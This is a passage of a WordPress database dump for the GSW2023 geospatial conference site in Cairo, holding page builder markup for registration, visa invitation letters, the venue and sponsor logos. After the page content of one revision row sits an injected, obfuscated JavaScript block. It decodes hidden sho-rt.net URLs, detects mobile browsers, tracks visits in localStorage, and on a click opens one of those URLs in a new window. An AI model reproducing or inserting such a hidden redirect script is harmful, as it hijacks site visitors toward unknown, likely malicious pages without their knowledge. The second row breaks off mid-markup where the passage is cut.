2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:03:14','2023-06-09 22:03:14','',3066,'https://gsw2023.com/?p=4664',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4665,1,'2023-06-09 22:04:19','2023-06-09 22:04:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a 